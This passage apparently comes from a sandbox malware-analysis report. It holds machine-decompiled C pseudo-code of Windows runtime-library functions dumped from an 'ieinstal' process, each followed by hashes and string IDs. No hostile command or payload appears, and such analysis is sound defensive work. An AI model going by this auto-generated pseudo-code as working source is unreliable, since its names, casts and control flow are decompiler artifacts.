                        												_t64 = E1ED87016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
                        											}
                        										}
                        									}
                        								}
                        								return _t64;
                        							}
                        						}
                        						_t97 = _t88;
                        						_t93 = _t109;
                        						E1ED9FDDA(_t97, _v12);
                        						_t105 =  *_t109;
                        						_t67 = _v12 + 1;
                        						_v12 = _t67;
                        						__eflags = _t105 - 0xffffffff;
                        						if(_t105 == 0xffffffff) {
                        							_t106 = 0;
                        							__eflags = 0;
                        						} else {
                        							_t106 =  *(_t105 + 0x14);
                        						}
                        						__eflags = _t67 - 2;
                        						if(_t67 > 2) {
                        							__eflags = _t109 - 0x1edf5350;
                        							if(_t109 != 0x1edf5350) {
                        								__eflags = _t106 - _v20;
                        								if(__eflags == 0) {
                        									_t93 = _t109;
                        									E1ED9FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
                        								}
                        							}
                        						}
                        						_push("RTL: Re-Waiting\n");
                        						_push(0);
                        						_push(0x65);
                        						_v20 = _t106;
                        						E1ED95720();
                        						_t104 = _v28;
                        						_t116 = _t116 + 0xc;
                        						continue;
                        					}
                        				}
                        			}

                        Strings
                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID: RTL: Re-Waiting
                        • API String ID: 0-316354757
                        • Opcode ID: 5d04a46b24b815155bd24542eb87db6c753e47607562184648821ec9b6e02410
                        • Instruction ID: 25d549d2d6419916f46e583435700c65b3db345a5aaa6567dfe1c9a6abd4757e
                        • Opcode Fuzzy Hash: 5d04a46b24b815155bd24542eb87db6c753e47607562184648821ec9b6e02410
                        • Instruction Fuzzy Hash: 95613431A01685DFDB21CB69C890B6E77F6EF40B14F1907A9E8519B3C2C734ED8187A2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 80%
                        			E1EDD0EA5(void* __ecx, void* __edx) {
                        				signed int _v20;
                        				char _v24;
                        				intOrPtr _v28;
                        				unsigned int _v32;
                        				signed int _v36;
                        				intOrPtr _v40;
                        				char _v44;
                        				intOrPtr _v64;
                        				void* __ebx;
                        				void* __edi;
                        				signed int _t58;
                        				unsigned int _t60;
                        				intOrPtr _t62;
                        				char* _t67;
                        				char* _t69;
                        				void* _t80;
                        				void* _t83;
                        				intOrPtr _t93;
                        				intOrPtr _t115;
                        				char _t117;
                        				void* _t120;
                        
                        				_t83 = __edx;
                        				_t117 = 0;
                        				_t120 = __ecx;
                        				_v44 = 0;
                        				if(E1EDCFF69(__ecx,  &_v44,  &_v32) < 0) {
                        					L24:
                        					_t109 = _v44;
                        					if(_v44 != 0) {
                        						E1EDD1074(_t83, _t120, _t109, _t117, _t117);
                        					}
                        					L26:
                        					return _t117;
                        				}
                        				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
                        				_t5 = _t83 + 1; // 0x1
                        				_v36 = _t5 << 0xc;
                        				_v40 = _t93;
                        				_t58 =  *(_t93 + 0xc) & 0x40000000;
                        				asm("sbb ebx, ebx");
                        				_t83 = ( ~_t58 & 0x0000003c) + 4;
                        				if(_t58 != 0) {
                        					_push(0);
                        					_push(0x14);
                        					_push( &_v24);
                        					_push(3);
                        					_push(_t93);
                        					_push(0xffffffff);
                        					_t80 = E1ED49730();
                        					_t115 = _v64;
                        					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
                        						_push(_t93);
                        						E1EDCA80D(_t115, 1, _v20, _t117);
                        						_t83 = 4;
                        					}
                        				}
                        				if(E1EDCA854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
                        					goto L24;
                        				}
                        				_t60 = _v32;
                        				_t97 = (_t60 != 0x100000) + 1;
                        				_t83 = (_v44 -  *0x1edf8b04 >> 0x14) + (_v44 -  *0x1edf8b04 >> 0x14);
                        				_v28 = (_t60 != 0x100000) + 1;
                        				_t62 = _t83 + (_t60 >> 0x14) * 2;
                        				_v40 = _t62;
                        				if(_t83 >= _t62) {
                        					L10:
                        					asm("lock xadd [eax], ecx");
                        					asm("lock xadd [eax], ecx");
                        					if(E1ED27D50() == 0) {
                        						_t67 = 0x7ffe0380;
                        					} else {
                        						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                        					}
                        					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                        						E1EDC138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
                        					}
                        					if(E1ED27D50() == 0) {
                        						_t69 = 0x7ffe0388;
                        					} else {
                        						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                        					}
                        					if( *_t69 != 0) {
                        						E1EDBFEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
                        					}
                        					if(( *0x1edf8724 & 0x00000008) != 0) {
                        						E1EDC52F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
                        					}
                        					_t117 = _v44;
                        					goto L26;
                        				}
                        				while(E1EDD15B5(0x1edf8ae4, _t83, _t97, _t97) >= 0) {
                        					_t97 = _v28;
                        					_t83 = _t83 + 2;
                        					if(_t83 < _v40) {
                        						continue;
                        					}
                        					goto L10;
                        				}
                        				goto L24;
                        			}

                        Strings
                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID: `
                        • API String ID: 0-2679148245
                        • Opcode ID: 6311d7331d3ad364ed9831bc3d0a0aaac2ca396abab0821589f3e2903a7df5cb
                        • Instruction ID: 0c15cb83336cc56d77d8844b39e4e9389adf6f9022dd1fee2bba87c2439b139a
                        • Opcode Fuzzy Hash: 6311d7331d3ad364ed9831bc3d0a0aaac2ca396abab0821589f3e2903a7df5cb
                        • Instruction Fuzzy Hash: 585168752083829BD310DE29D990B2BB7E6FFC4744F100A2CE996972D0D761E80ACB62
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 75%
                        			E1ED3F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
                        				intOrPtr _v8;
                        				intOrPtr _v12;
                        				intOrPtr _v16;
                        				char* _v20;
                        				intOrPtr _v24;
                        				char _v28;
                        				intOrPtr _v32;
                        				char _v36;
                        				char _v44;
                        				char _v52;
                        				intOrPtr _v56;
                        				char _v60;
                        				intOrPtr _v72;
                        				void* _t51;
                        				void* _t58;
                        				signed short _t82;
                        				short _t84;
                        				signed int _t91;
                        				signed int _t100;
                        				signed short* _t103;
                        				void* _t108;
                        				intOrPtr* _t109;
                        
                        				_t103 = __ecx;
                        				_t82 = __edx;
                        				_t51 = E1ED24120(0, __ecx, 0,  &_v52, 0, 0, 0);
                        				if(_t51 >= 0) {
                        					_push(0x21);
                        					_push(3);
                        					_v56 =  *0x7ffe02dc;
                        					_v20 =  &_v52;
                        					_push( &_v44);
                        					_v28 = 0x18;
                        					_push( &_v28);
                        					_push(0x100020);
                        					_v24 = 0;
                        					_push( &_v60);
                        					_v16 = 0x40;
                        					_v12 = 0;
                        					_v8 = 0;
                        					_t58 = E1ED49830();
                        					_t87 =  *[fs:0x30];
                        					_t108 = _t58;
                        					L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
                        					if(_t108 < 0) {
                        						L11:
                        						_t51 = _t108;
                        					} else {
                        						_push(4);
                        						_push(8);
                        						_push( &_v36);
                        						_push( &_v44);
                        						_push(_v60);
                        						_t108 = E1ED49990();
                        						if(_t108 < 0) {
                        							L10:
                        							_push(_v60);
                        							E1ED495D0();
                        							goto L11;
                        						} else {
                        							_t109 = L1ED24620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
                        							if(_t109 == 0) {
                        								_t108 = 0xc0000017;
                        								goto L10;
                        							} else {
                        								_t21 = _t109 + 0x18; // 0x18
                        								 *((intOrPtr*)(_t109 + 4)) = _v60;
                        								 *_t109 = 1;
                        								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
                        								 *(_t109 + 0xe) = _t82;
                        								 *((intOrPtr*)(_t109 + 8)) = _v56;
                        								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
                        								E1ED4F3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
                        								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
                        								 *((short*)(_t109 + 0xc)) =  *_t103;
                        								_t91 =  *_t103 & 0x0000ffff;
                        								_t100 = _t91 & 0xfffffffe;
                        								_t84 = 0x5c;
                        								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
                        									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
                        										_push(_v60);
                        										E1ED495D0();
                        										L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
                        										_t51 = 0xc0000106;
                        									} else {
                        										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
                        										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
                        										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
                        										goto L5;
                        									}
                        								} else {
                        									L5:
                        									 *_a4 = _t109;
                        									_t51 = 0;
                        								}
                        							}
                        						}
                        					}
                        				}
                        				return _t51;
                        			}

                        Strings
                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID: @
                        • API String ID: 0-2766056989
                        • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                        • Instruction ID: 118eff9e19b8b2d141d045d3e7e50a068843fe3eabe24010746b46a8385210bb
                        • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                        • Instruction Fuzzy Hash: 9551BE75500751AFC320CF29C840A6BBBF9FF48714F108A2EF99587690E7B4E944CBA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 75%
                        			E1ED83540(intOrPtr _a4) {
                        				signed int _v12;
                        				intOrPtr _v88;
                        				intOrPtr _v92;
                        				char _v96;
                        				char _v352;
                        				char _v1072;
                        				intOrPtr _v1140;
                        				intOrPtr _v1148;
                        				char _v1152;
                        				char _v1156;
                        				char _v1160;
                        				char _v1164;
                        				char _v1168;
                        				char* _v1172;
                        				short _v1174;
                        				char _v1176;
                        				char _v1180;
                        				char _v1192;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				void* __ebp;
                        				short _t41;
                        				short _t42;
                        				intOrPtr _t80;
                        				intOrPtr _t81;
                        				signed int _t82;
                        				void* _t83;
                        
                        				_v12 =  *0x1edfd360 ^ _t82;
                        				_t41 = 0x14;
                        				_v1176 = _t41;
                        				_t42 = 0x16;
                        				_v1174 = _t42;
                        				_v1164 = 0x100;
                        				_v1172 = L"BinaryHash";
                        				_t81 = E1ED40BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
                        				if(_t81 < 0) {
                        					L11:
                        					_t75 = _t81;
                        					E1ED83706(0, _t81, _t79, _t80);
                        					L12:
                        					if(_a4 != 0xc000047f) {
                        						E1ED4FA60( &_v1152, 0, 0x50);
                        						_v1152 = 0x60c201e;
                        						_v1148 = 1;
                        						_v1140 = E1ED83540;
                        						E1ED4FA60( &_v1072, 0, 0x2cc);
                        						_push( &_v1072);
                        						E1ED5DDD0( &_v1072, _t75, _t79, _t80, _t81);
                        						E1ED90C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
                        						_push(_v1152);
                        						_push(0xffffffff);
                        						E1ED497C0();
                        					}
                        					return E1ED4B640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
                        				}
                        				_t79 =  &_v352;
                        				_t81 = E1ED83971(0, _a4,  &_v352,  &_v1156);
                        				if(_t81 < 0) {
                        					goto L11;
                        				}
                        				_t75 = _v1156;
                        				_t79 =  &_v1160;
                        				_t81 = E1ED83884(_v1156,  &_v1160,  &_v1168);
                        				if(_t81 >= 0) {
                        					_t80 = _v1160;
                        					E1ED4FA60( &_v96, 0, 0x50);
                        					_t83 = _t83 + 0xc;
                        					_push( &_v1180);
                        					_push(0x50);
                        					_push( &_v96);
                        					_push(2);
                        					_push( &_v1176);
                        					_push(_v1156);
                        					_t81 = E1ED49650();
                        					if(_t81 >= 0) {
                        						if(_v92 != 3 || _v88 == 0) {
                        							_t81 = 0xc000090b;
                        						}
                        						if(_t81 >= 0) {
                        							_t75 = _a4;
                        							_t79 =  &_v352;
                        							E1ED83787(_a4,  &_v352, _t80);
                        						}
                        					}
                        					L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
                        				}
                        				_push(_v1156);
                        				E1ED495D0();
                        				if(_t81 >= 0) {
                        					goto L12;
                        				} else {
                        					goto L11;
                        				}
                        			}

                        Strings
                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID: BinaryHash
                        • API String ID: 0-2202222882
                        • Opcode ID: 63f6998f41cd2d67149cc2cec929cbfbc73f08566a201b6961fb1aa02fa709e9
                        • Instruction ID: 4fb396d8998933de0e420b1ed5680a67dc1455373cce104a1d03ea611f3eb9a1
                        • Opcode Fuzzy Hash: 63f6998f41cd2d67149cc2cec929cbfbc73f08566a201b6961fb1aa02fa709e9
                        • Instruction Fuzzy Hash: 274154B5D0056D9BDB21CA54CC81F9EB77CAF44714F1046A5EA09AB290DB30AE888FA4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 71%
                        			E1EDD05AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
                        				signed int _v20;
                        				char _v24;
                        				signed int _v28;
                        				char _v32;
                        				signed int _v36;
                        				intOrPtr _v40;
                        				void* __ebx;
                        				void* _t35;
                        				signed int _t42;
                        				char* _t48;
                        				signed int _t59;
                        				signed char _t61;
                        				signed int* _t79;
                        				void* _t88;
                        
                        				_v28 = __edx;
                        				_t79 = __ecx;
                        				if(E1EDD07DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
                        					L13:
                        					_t35 = 0;
                        					L14:
                        					return _t35;
                        				}
                        				_t61 = __ecx[1];
                        				_t59 = __ecx[0xf];
                        				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
                        				_v36 = _a8 << 0xc;
                        				_t42 =  *(_t59 + 0xc) & 0x40000000;
                        				asm("sbb esi, esi");
                        				_t88 = ( ~_t42 & 0x0000003c) + 4;
                        				if(_t42 != 0) {
                        					_push(0);
                        					_push(0x14);
                        					_push( &_v24);
                        					_push(3);
                        					_push(_t59);
                        					_push(0xffffffff);
                        					if(E1ED49730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
                        						_push(_t61);
                        						E1EDCA80D(_t59, 1, _v20, 0);
                        						_t88 = 4;
                        					}
                        				}
                        				_t35 = E1EDCA854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
                        				if(_t35 < 0) {
                        					goto L14;
                        				}
                        				E1EDD1293(_t79, _v40, E1EDD07DF(_t79, _v28,  &_a4,  &_a8, 1));
                        				if(E1ED27D50() == 0) {
                        					_t48 = 0x7ffe0380;
                        				} else {
                        					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                        				}
                        				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                        					E1EDC138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
                        				}
                        				goto L13;
                        			}

                        Strings
                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID: `
                        • API String ID: 0-2679148245
                        • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                        • Instruction ID: 82bdabf2eaa86c45358eeaeebcd9af3345f56ee3ff86f6b3e231cb7911af4d4b
                        • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                        • Instruction Fuzzy Hash: C531AF32604345ABE710CE25CD85F9A7BDABBC47A4F044729B959DB6C0E770E908CBA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 72%
                        			E1ED83884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
                        				char _v8;
                        				intOrPtr _v12;
                        				intOrPtr* _v16;
                        				char* _v20;
                        				short _v22;
                        				char _v24;
                        				intOrPtr _t38;
                        				short _t40;
                        				short _t41;
                        				void* _t44;
                        				intOrPtr _t47;
                        				void* _t48;
                        
                        				_v16 = __edx;
                        				_t40 = 0x14;
                        				_v24 = _t40;
                        				_t41 = 0x16;
                        				_v22 = _t41;
                        				_t38 = 0;
                        				_v12 = __ecx;
                        				_push( &_v8);
                        				_push(0);
                        				_push(0);
                        				_push(2);
                        				_t43 =  &_v24;
                        				_v20 = L"BinaryName";
                        				_push( &_v24);
                        				_push(__ecx);
                        				_t47 = 0;
                        				_t48 = E1ED49650();
                        				if(_t48 >= 0) {
                        					_t48 = 0xc000090b;
                        				}
                        				if(_t48 != 0xc0000023) {
                        					_t44 = 0;
                        					L13:
                        					if(_t48 < 0) {
                        						L16:
                        						if(_t47 != 0) {
                        							L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
                        						}
                        						L18:
                        						return _t48;
                        					}
                        					 *_v16 = _t38;
                        					 *_a4 = _t47;
                        					goto L18;
                        				}
                        				_t47 = L1ED24620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
                        				if(_t47 != 0) {
                        					_push( &_v8);
                        					_push(_v8);
                        					_push(_t47);
                        					_push(2);
                        					_push( &_v24);
                        					_push(_v12);
                        					_t48 = E1ED49650();
                        					if(_t48 < 0) {
                        						_t44 = 0;
                        						goto L16;
                        					}
                        					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
                        						_t48 = 0xc000090b;
                        					}
                        					_t44 = 0;
                        					if(_t48 < 0) {
                        						goto L16;
                        					} else {
                        						_t17 = _t47 + 0xc; // 0xc
                        						_t38 = _t17;
                        						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
                        							_t48 = 0xc000090b;
                        						}
                        						goto L13;
                        					}
                        				}
                        				_t48 = _t48 + 0xfffffff4;
                        				goto L18;
                        			}

                        Strings
                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID: BinaryName
                        • API String ID: 0-215506332
                        • Opcode ID: ab0a1bb06adf233dd11d102b9d4b38d1950d05579f349645a0d7a8d28fcdbf8b
                        • Instruction ID: 14831431ca0d9e60dac4198af9f16a2fd6d8028e023e83c1e95a4a57857c89fe
                        • Opcode Fuzzy Hash: ab0a1bb06adf233dd11d102b9d4b38d1950d05579f349645a0d7a8d28fcdbf8b
                        • Instruction Fuzzy Hash: 26312536D0061ABFDB15DB59C941E6FB775EF80B20F014369E858A72A0DB30DE00CBA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 33%
                        			E1ED3D294(void* __ecx, char __edx, void* __eflags) {
                        				signed int _v8;
                        				char _v52;
                        				signed int _v56;
                        				signed int _v60;
                        				intOrPtr _v64;
                        				char* _v68;
                        				intOrPtr _v72;
                        				char _v76;
                        				signed int _v84;
                        				intOrPtr _v88;
                        				char _v92;
                        				intOrPtr _v96;
                        				intOrPtr _v100;
                        				char _v104;
                        				char _v105;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				signed int _t35;
                        				char _t38;
                        				signed int _t40;
                        				signed int _t44;
                        				signed int _t52;
                        				void* _t53;
                        				void* _t55;
                        				void* _t61;
                        				intOrPtr _t62;
                        				void* _t64;
                        				signed int _t65;
                        				signed int _t66;
                        
                        				_t68 = (_t66 & 0xfffffff8) - 0x6c;
                        				_v8 =  *0x1edfd360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
                        				_v105 = __edx;
                        				_push( &_v92);
                        				_t52 = 0;
                        				_push(0);
                        				_push(0);
                        				_push( &_v104);
                        				_push(0);
                        				_t59 = __ecx;
                        				_t55 = 2;
                        				if(E1ED24120(_t55, __ecx) < 0) {
                        					_t35 = 0;
                        					L8:
                        					_pop(_t61);
                        					_pop(_t64);
                        					_pop(_t53);
                        					return E1ED4B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
                        				}
                        				_v96 = _v100;
                        				_t38 = _v92;
                        				if(_t38 != 0) {
                        					_v104 = _t38;
                        					_v100 = _v88;
                        					_t40 = _v84;
                        				} else {
                        					_t40 = 0;
                        				}
                        				_v72 = _t40;
                        				_v68 =  &_v104;
                        				_push( &_v52);
                        				_v76 = 0x18;
                        				_push( &_v76);
                        				_v64 = 0x40;
                        				_v60 = _t52;
                        				_v56 = _t52;
                        				_t44 = E1ED498D0();
                        				_t62 = _v88;
                        				_t65 = _t44;
                        				if(_t62 != 0) {
                        					asm("lock xadd [edi], eax");
                        					if((_t44 | 0xffffffff) != 0) {
                        						goto L4;
                        					}
                        					_push( *((intOrPtr*)(_t62 + 4)));
                        					E1ED495D0();
                        					L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
                        					goto L4;
                        				} else {
                        					L4:
                        					L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
                        					if(_t65 >= 0) {
                        						_t52 = 1;
                        					} else {
                        						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
                        							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
                        						}
                        					}
                        					_t35 = _t52;
                        					goto L8;
                        				}
                        			}

                        Strings
                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID: @
                        • API String ID: 0-2766056989
                        • Opcode ID: 9da7e28c232b93acb9fef7ac5e25949e802207d3c3bca97c9e12c1f0d9b59ab3
                        • Instruction ID: aa3ea0782ab6580bb4865643bc6c84cc7766975ceaf0ff9823da39ad02911a7e
                        • Opcode Fuzzy Hash: 9da7e28c232b93acb9fef7ac5e25949e802207d3c3bca97c9e12c1f0d9b59ab3
                        • Instruction Fuzzy Hash: DD317CB55083859FC311CF29C980A5BFBE9EB95654F600B2EF99493250D734DD09CFA2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 72%
                        			E1ED11B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
                        				intOrPtr _v8;
                        				char _v16;
                        				intOrPtr* _t26;
                        				intOrPtr _t29;
                        				void* _t30;
                        				signed int _t31;
                        
                        				_t27 = __ecx;
                        				_t29 = __edx;
                        				_t31 = 0;
                        				_v8 = __edx;
                        				if(__edx == 0) {
                        					L18:
                        					_t30 = 0xc000000d;
                        					goto L12;
                        				} else {
                        					_t26 = _a4;
                        					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
                        						goto L18;
                        					} else {
                        						E1ED4BB40(__ecx,  &_v16, __ecx);
                        						_push(_t26);
                        						_push(0);
                        						_push(0);
                        						_push(_t29);
                        						_push( &_v16);
                        						_t30 = E1ED4A9B0();
                        						if(_t30 >= 0) {
                        							_t19 =  *_t26;
                        							if( *_t26 != 0) {
                        								goto L7;
                        							} else {
                        								 *_a8 =  *_a8 & 0;
                        							}
                        						} else {
                        							if(_t30 != 0xc0000023) {
                        								L9:
                        								_push(_t26);
                        								_push( *_t26);
                        								_push(_t31);
                        								_push(_v8);
                        								_push( &_v16);
                        								_t30 = E1ED4A9B0();
                        								if(_t30 < 0) {
                        									L12:
                        									if(_t31 != 0) {
                        										L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
                        									}
                        								} else {
                        									 *_a8 = _t31;
                        								}
                        							} else {
                        								_t19 =  *_t26;
                        								if( *_t26 == 0) {
                        									_t31 = 0;
                        								} else {
                        									L7:
                        									_t31 = L1ED24620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
                        								}
                        								if(_t31 == 0) {
                        									_t30 = 0xc0000017;
                        								} else {
                        									goto L9;
                        								}
                        							}
                        						}
                        					}
                        				}
                        				return _t30;
                        			}










                        Strings
                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID: WindowsExcludedProcs
                        • API String ID: 0-3583428290
                        • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                        • Instruction ID: 4a3c7477cdbcb96d086ebbd17538fece90b39c6330d460939660acfd3b44ed06
                        • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                        • Instruction Fuzzy Hash: 5121F23A900239ABDB118BAAD840F4BB7FFAF85A50F164626FD449F204E631DC0087B0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E1ED2F716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
                        				intOrPtr _t13;
                        				intOrPtr _t14;
                        				signed int _t16;
                        				signed char _t17;
                        				intOrPtr _t19;
                        				intOrPtr _t21;
                        				intOrPtr _t23;
                        				intOrPtr* _t25;
                        
                        				_t25 = _a8;
                        				_t17 = __ecx;
                        				if(_t25 == 0) {
                        					_t19 = 0xc00000f2;
                        					L8:
                        					return _t19;
                        				}
                        				if((__ecx & 0xfffffffe) != 0) {
                        					_t19 = 0xc00000ef;
                        					goto L8;
                        				}
                        				_t19 = 0;
                        				 *_t25 = 0;
                        				_t21 = 0;
                        				_t23 = "Actx ";
                        				if(__edx != 0) {
                        					if(__edx == 0xfffffffc) {
                        						L21:
                        						_t21 = 0x200;
                        						L5:
                        						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
                        						 *_t25 = _t13;
                        						L6:
                        						if(_t13 == 0) {
                        							if((_t17 & 0x00000001) != 0) {
                        								 *_t25 = _t23;
                        							}
                        						}
                        						L7:
                        						goto L8;
                        					}
                        					if(__edx == 0xfffffffd) {
                        						 *_t25 = _t23;
                        						_t13 = _t23;
                        						goto L6;
                        					}
                        					_t13 =  *((intOrPtr*)(__edx + 0x10));
                        					 *_t25 = _t13;
                        					L14:
                        					if(_t21 == 0) {
                        						goto L6;
                        					}
                        					goto L5;
                        				}
                        				_t14 = _a4;
                        				if(_t14 != 0) {
